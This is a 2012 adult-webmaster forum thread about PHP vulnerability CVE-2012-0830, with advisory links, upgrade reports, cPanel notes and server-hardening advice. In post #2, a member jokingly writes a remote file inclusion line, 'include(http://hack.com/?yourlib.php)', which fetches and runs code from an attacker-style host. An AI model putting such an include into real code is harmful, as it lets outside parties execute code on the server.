Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 02-04-2012, 03:31 AM   #1
MrGusMuller
Confirmed User
 
MrGusMuller's Avatar
 
Industry Role:
Join Date: Oct 2010
Location: Portugal
Posts: 1,261
Critical vulnerability identified in PHP

Quote:
A critical vulnerability in the most recent release of PHP has just been found (CVE-2012-0830). This exploit could allow arbitrary code to be remotely executed on a PHP system. This vulnerability is present both on PHP 5.3.9, and on PHP 5.2.17 that contains a backported fix for CVE-2011-4885.
in Zend Server Update Email

https://bugzilla.redhat.com/show_bug.cgi?id=786686
http://thexploit.com/sec/critical-ph...collision-dos/

You all should update to the PHP 5.3.10.
__________________
StagCMS - Adult CMS - user friendly adult content management system - speed up your websites with no SQL connections
ICQ: 63*23*43*113

MrGusMuller is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-04-2012, 03:52 AM   #2
raymor
Confirmed User
 
Join Date: Oct 2002
Posts: 3,745
Thanks. Of course PHP itself is a arbitrary code execution vulnerability. include(http://hack.com/?yourlib.php) anyone?
__________________
For historical display only. This information is not current:
support@bettercgi.com ICQ 7208627
Strongbox - The next generation in site security
Throttlebox - The next generation in bandwidth control
Clonebox - Backup and disaster recovery on steroids
raymor is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-04-2012, 06:44 AM   #3
Klen
 
Klen's Avatar
 
Industry Role:
Join Date: Aug 2006
Location: Little Vienna
Posts: 32,234
I cant update to 5.3,it's too different to ver 5.2.Any fix for version 5.2 ?
Klen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-04-2012, 06:46 AM   #4
fris
Too lazy to set a custom title
 
fris's Avatar
 
Industry Role:
Join Date: Aug 2002
Posts: 54,946
Quote:
Originally Posted by KlenTelaris View Post
I cant update to 5.3,it's too different to ver 5.2.Any fix for version 5.2 ?
im pretty sure it only effects 5.3.x
__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff
fris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-04-2012, 06:46 AM   #5
Fletch XXX
GFY HALL OF FAME DAMMIT!!!
 
Fletch XXX's Avatar
 
Join Date: Jan 2002
Location: that 504
Posts: 60,840
thanks for posting.
__________________

Want an Android App for your tube, membership, or free site?

Need banners or promo material? Hit us up (ICQ Fletch: 148841377) or email me fletchxxx at gmail.com - recent work - About me
Fletch XXX is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-04-2012, 06:58 AM   #6
DamageX
Marketing & Strategy
 
DamageX's Avatar
 
Industry Role:
Join Date: Jun 2001
Location: Former nomad
Posts: 14,293
Quote:
Originally Posted by fris View Post
im pretty sure it only effects 5.3.x
Quote:
This vulnerability is present both on PHP 5.3.9, and on PHP 5.2.17 that contains a backported fix for CVE-2011-4885.
Looks like it does affect at least one version of 5.2.x
__________________
Whitehat is for chumps

If you don't do it, somebody else will - true story!
DamageX is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-04-2012, 07:33 AM   #7
fris
Too lazy to set a custom title
 
fris's Avatar
 
Industry Role:
Join Date: Aug 2002
Posts: 54,946
oh snap time to upgrade then
__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff
fris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-04-2012, 12:43 PM   #8
fris
Too lazy to set a custom title
 
fris's Avatar
 
Industry Role:
Join Date: Aug 2002
Posts: 54,946
just finished my upgrade

Quote:
PHP 5.3.10 with Suhosin-Patch (cli) (built: Feb 4 2012 06:50:45)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
with the ionCube PHP Loader v4.0.12, Copyright (c) 2002-2011, by ionCube Ltd
__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff
fris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-04-2012, 03:53 PM   #9
LiveDose
Show Yer Tits!
 
LiveDose's Avatar
 
Industry Role:
Join Date: Feb 2002
Location: Somewhere Out there...
Posts: 25,793
Bump. Thanks.
__________________

Scammer Alert: acer19 acer [email protected] [email protected] Money stolen using PayPal
LiveDose is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-07-2012, 05:05 AM   #10
MrGusMuller
Confirmed User
 
MrGusMuller's Avatar
 
Industry Role:
Join Date: Oct 2010
Location: Portugal
Posts: 1,261
For those with CPanel...
EasyApache 3.8.6 is now available; in this build PHP 5.3.10 replaces 5.3.9.
The change log is available here: http://docs.cpanel.net/twiki/bin/vie...syApache#3.8.6
__________________
StagCMS - Adult CMS - user friendly adult content management system - speed up your websites with no SQL connections
ICQ: 63*23*43*113

MrGusMuller is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-07-2012, 05:34 AM   #11
seeandsee
Check SIG!
 
seeandsee's Avatar
 
Industry Role:
Join Date: Mar 2006
Location: Europe (Skype: gojkoas)
Posts: 50,945
Fucking vulnerability holes, is there some super protected coding to work with...
__________________
BUY MY SIG - 50$/Year

Contact here
seeandsee is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-07-2012, 06:36 AM   #12
Klen
 
Klen's Avatar
 
Industry Role:
Join Date: Aug 2006
Location: Little Vienna
Posts: 32,234
But still question is will it fuck up some scripts if i do update....
Klen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-07-2012, 06:40 AM   #13
Operator
So Fucking Banned
 
Industry Role:
Join Date: May 2009
Location: ΠπΠ
Posts: 2,419
Php 5.1.6
Operator is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-07-2012, 06:41 AM   #14
6South
Registered User
 
6South's Avatar
 
Industry Role:
Join Date: Jan 2011
Posts: 84
PHP is a risk no matter what version you upgrade to and installing the latest, greatest build of PHP is almost guaranteed to break at least one of your apps.

As usual, this type of vulnerability can be protected against without constant upgrading by simply managing your PHP configuration and responsible administration / monitoring of your servers.

Suhosin, responsible PHP settings, active protection (mod_security) and a decent malware / exploit scanner will serve you much better than trying to keep up with the patches. For every published exploit there's at least a dozen others out there at any given time.
6South is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks

Tags
hack, php, security



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.